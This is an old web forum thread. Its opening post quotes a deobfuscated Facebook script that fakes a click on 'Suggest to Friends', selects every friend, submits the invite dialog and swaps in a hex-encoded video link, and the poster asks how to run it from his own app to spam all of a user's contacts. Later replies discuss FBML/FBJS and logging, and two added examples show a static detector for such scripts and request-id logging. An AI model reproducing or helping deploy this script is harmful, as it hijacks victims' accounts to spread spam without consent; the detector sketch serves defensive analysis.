The Cache: Technology Expert's Forum
 
Author Topic: Facebook & Javascript...  (Read 6244 times)
rasputin
n00b
« on: May 24, 2010, 06:15:22 PM »

I need some help as to how to be able to do this.

http://www.facebook.com/pages/Tom-Oh/126929663989822?v=app_4949752878&ref=ts

After liking the page, you are presented with some javascript which can be deobfuscated and read clearly to see the javascript code. I don't really understand javascript but some of the simple things that I can see in the code are that I can see where to change it to my own app ids etc.

What else am I missing on my page if I want users to be able to execute this javascript into the browser from my app?

Code:
void(document['getElementById']('app4949752878_dd')['innerHTML'] = '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=126929663989822" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>Suggest to Friends</a>');
var ss = document['getElementById']('suggest');
var c = document['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
void(ss['dispatchEvent'](c));
void(setTimeout(function () {
    fs['select_all']();
}, 3000));
void(setTimeout(function () {
    SocialGraphManager['submitDialog']('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
}, 4000));
void(setTimeout(function () {
    document['getElementById']('app4949752878_dd')['innerHTML'] = '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x79\x6f\x75\x74\x75\x62\x65\x2e\x63\x6f\x6d\x2f\x77\x61\x74\x63\x68\x3f\x76\x3d\x49\x30\x58\x50\x70\x32\x6b\x53\x6a\x62\x41\x22\x3e\x4e\x49\x43\x45\x53\x54\x21\x21\x21\x20\x43\x4c\x49\x43\x4b\x20\x48\x45\x52\x45\x20\x54\x4f\x20\x57\x41\x54\x43\x48\x20\x54\x4f\x4d\x2d\x4f\x48\x27\x73\x20\x4e\x45\x57\x20\x4d\x55\x53\x49\x43\x20\x56\x49\x44\x45\x4f\x20\x21\x21\x21\x3c\x2f\x61\x3e\x20';
}, 4500));

From looking at that, does my page need some sort of file attached? What is it?

Btw, the script invites all friend contacts to the group immediately when executed into the browser.
« Last Edit: May 24, 2010, 06:17:26 PM by rasputin »

No links in signatures please
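
Added example, not part of the original posts: a static triage sketch in JavaScript that treats a script like the one quoted above purely as text, decodes its `\x..` escapes and reports the behaviours visible in it (injected markup, a synthetic click, timed actions, select-all, a scripted dialog submit). The rule names and the shortened sample input are constructed for this example.

```javascript
// Static triage only: the input is handled as text and never executed.

// Decode \xNN escapes so markup hidden in string literals becomes readable.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Behaviours seen in the quoted script; rule ids are this example's own.
const RULES = [
  { id: 'synthetic-click', re: /createEvent[\s\S]*dispatchEvent/ },
  { id: 'markup-injection', re: /innerHTML['"]?\]?\s*=(?!=)/ },
  { id: 'delayed-action', re: /setTimeout\s*\(/ },
  { id: 'select-all-recipients', re: /select_all/ },
  { id: 'scripted-form-submit', re: /submitDialog/ },
];

// Return matched rule ids, URLs revealed after decoding, and the escape count.
function triage(src) {
  const decoded = decodeHexEscapes(src);
  return {
    findings: RULES.filter(rule => rule.re.test(decoded)).map(rule => rule.id),
    urls: decoded.match(/https?:\/\/[^\s"'<>]+/g) || [],
    hexEscapes: (src.match(/\\x[0-9a-fA-F]{2}/g) || []).length,
  };
}

// Constructed sample with the same shape as the quoted script (placeholder ids,
// example.com as the hidden link, no dialog submit).
const SAMPLE = String.raw`
void(document['getElementById']('box')['innerHTML'] = '<a id="s" href="#">x</a>');
var c = document['createEvent']('MouseEvents');
c['initEvent']('click', true, true);
void(document['getElementById']('s')['dispatchEvent'](c));
void(setTimeout(function () { fs['select_all'](); }, 3000));
void(setTimeout(function () { document['getElementById']('box')['innerHTML'] = '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x2f\x22\x3e'; }, 4500));
`;

console.log(triage(SAMPLE));
```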
nop_90
Global Moderator
Lifer
« Reply #1 on: May 24, 2010, 08:09:05 PM »

Javascript on FB is not really JS (from a developer's perspective)
http://wiki.developers.facebook.com/index.php/FBJS
Thurston
n00b
« Reply #2 on: January 16, 2011, 09:41:06 PM »

I've tried FBML at my page and it was working with the code. If you are interested to change it, you might be able to try the FBML. This one is easy to connect and add in your page.

Ah ah ah... no links in sigs for n00bs...
perkiset
Olde World Hacker
Administrator
Lifer
« Reply #3 on: January 16, 2011, 10:46:23 PM »

'Bot

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
Lifer
« Reply #4 on: January 17, 2011, 08:13:08 PM »

Does this mean spam or is there really someone else trying to do a facebook application?

Bring some lube with you before 'allowin ' or 'liking' anything ... ever.

I'm struggling with some logging issues on the fb platforms and nobody at the fb developer forum
can answer me...

your app asks facebook a url... it then can clone it up to 4 times depending on the fbml in the request or
the requesting device or (ALIGNMENT OF THE NEW ZODIAC PERHAPS?) anyhow programming defensively is
almost impossible ... trying to use a UNIQUE ID in my original request but THAT is being duplicated by the FB
platform.

FB Platform then asks my PHP application (hosted on MY SITE) for 1-4 answers (all of which are dynamic and random)
my site sends back the 1-4 answers for the identical request (each dynamic) to the FB PLATFORM SERVERS
The fb platform then picks one of those four answers to ship back to the USER who initially requested the apps.facebook.com/myapp url.
what it does with the other 3 I have no idea.
Program defensively is best plan.. but how?!?!

so the end result is The USER sees answer 1, 2, 3 or 4 and I have no way of logging which distinct answer they saw.

it's a 'magic 8 ball' application so it would be nice to know which answer they received of the FOUR generated by my app
and then the one randomly picked by the FB PLATFORM to actually return to the user...
but no one at FB can help me on this..... generate a unique id in the original request? it's duplicated.

my only thought is to java post back to my lamp box if I get an answer and pray that everyone has working java

:wackoff.gif:

There is SOOOO MUCH going on in the middle and no way to program defensively against it unless you rely on some
outside chance that the user's device does enough java to send back the page they actually received so you can
track it in your MANY LOGS.

If you can get a FB application to work, the world is your oyster the whole world is on there...


Also if you can get it to work you are a fucking genius.


« Last Edit: January 17, 2011, 08:18:14 PM by Phaėton »

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
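
Added example (not from the original post and not Facebook platform code): one way to handle the duplicate fetches described above is to derive the answer from the request's unique id instead of a random draw, so all 1-4 responses to one request are identical and can be logged once. It assumes the same id reaches the application on every duplicate fetch, as the post reports; `answerFor`, `handle`, the answer list and the secret are hypothetical, and it is written for Node.js although the poster's app is PHP.

```javascript
const nodeCrypto = require('node:crypto');

// Hypothetical answer list and server-side key, constructed for this example.
const ANSWERS = ['Yes', 'No', 'Ask again later', 'Outlook good'];
const SECRET = 'replace-with-a-random-server-side-key';

// Keyed hash of the request id picks the answer. The same id always maps to
// the same answer, and without the key a client cannot predict the mapping.
function answerFor(requestId) {
  const mac = nodeCrypto.createHmac('sha256', SECRET)
    .update(String(requestId))
    .digest();
  return ANSWERS[mac.readUInt32BE(0) % ANSWERS.length];
}

// Track fetches per request id (in memory here; a real app would use its
// database). Only the first fetch needs a log entry, because every duplicate
// returns the same answer.
const fetchCounts = new Map();

function handle(requestId) {
  const answer = answerFor(requestId);
  const hits = (fetchCounts.get(requestId) || 0) + 1;
  fetchCounts.set(requestId, hits);
  return { answer, firstFetch: hits === 1, hits };
}

// Constructed scenario: the platform fetches the same request four times.
for (let i = 0; i < 4; i++) {
  console.log(handle('req-1001'));
}
```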
isthisthingon
Global Moderator
Lifer
« Reply #5 on: January 26, 2011, 09:30:57 PM »

javascript on FB is not really JS (from a developers perspective)
http://wiki.developers.facebook.com/index.php/FBJS

Just as Visualforce produces unpredictable HTML/Javascript. It also prepends tenant-specific identifiers to markup which winds up rendering colossal and unreadable viewstates like this:

Code:
<input type="hidden"  id="com.salesforce.visualforce.ViewState" name="com.salesforce.visualforce.ViewState" value="7WlmYU0h+44QjgdsfKe+KZOE/UR6CmfiBvAz7qhiGJrhiwro/wJw6S8SpHdutYtaRZsOC9FQm3nJmPdSowFRFMhTF+P0zEYIjLzruecrlwlHVulMDCHa7yLiTWH5JEejSyXG2eUI+Jr3C2/30nk48rF9WEpXv0SZNiSdSiuQwRHeJiDTNMXDxjJGL/3b8agK7gn16cghQ9d9lhoBLvoikvIkhxqpOstVZfpbM/UZd/AIMAGGxhhNG1Lh1OnCZa7bd1bmhGE1kJfJJSD94N9WQKvFzMqeY08jqmfjffMeIL6Ow8DlqsgbL7SN5LePg2uS8n0dCUyz0BVqhGCmQQf5Z3O/Eou73Ap394DjWmwCgs1dWHRfdWgps7X0+0eTwASKSZqGqkZPXCdNxj0jYtM0CLS1Vp/MvKpZXR7pZT8+p1lSZ0hc5/QQbTvbLiRURgWWr6ZJzmfPEwnyRJlavkJh08VzrsRlWcP7/eiTHV32Nh69+Kpk/rqOa17CrhfhqGuLzJ+NM5qnxXZ2J+lsZNNHA0P7YJpx2FWfyFNcWDLxSGhZwKYKR4uT38c0ne6cAuPH/iJvhbK7Uu2t8jm/ShCZKf6Qdtr70hMJeFfLmWvq8+EGIdavFCTILbPGfT6AnIWqw9BS9cmVUhhAmz2k1RLN1HYPUK9G36G8oGv1XymIJ9e/xOo1lL/SqyniaywRkboWBmWwUnUMgIIKrzlvklwbUbVJCESPdJjrp/U0Bhna0cv9lzfVEfBLkDHc8kOVaGpUrP2zejvNC2RX5FBj6TtlKvX8vjpFPl0mvECFk0ouAXOOD+D3kzPUVNZg8oZTDyO8lAZZc3moEfQj+KSbtWOnBha/O2vrxZFaAdolpjHe1JA/IXnvPm6HlUMZhuXb.........

What was once just id="theForm" becomes id="j_id0:theForm:leadfeed:j_id365:j_id366:j_id367:j_id368:tb"

Perhaps unrelated but the frustration seems similar :P

I would love to change the world, but they won't give me the source code.
nop_90
Global Moderator
Lifer
« Reply #6 on: January 27, 2011, 06:13:57 PM »

I made a FB app with google app engine just for shits and giggles.
This was a while back, but there are/were 2 types of app.
Ones that are in an iframe and FBML

Iframe apps are legacy; the recommended way is FBML.
Basically here is the sequence of events
1) User requests app (it will be some sort of FB url)
2) FB then proxies the url and passes it along to your server. Inside this "proxy" it runs it through a translator, turning FBML into HTML and FBJS into JS etc.
3) Your site does its shit and replies back.

http://www.merchantos.com/makebeta/facebook/facebook-php-tutorial/
If I remember correctly the canvas url which you put into the FB config maps to the url in your app.
That is the core of your application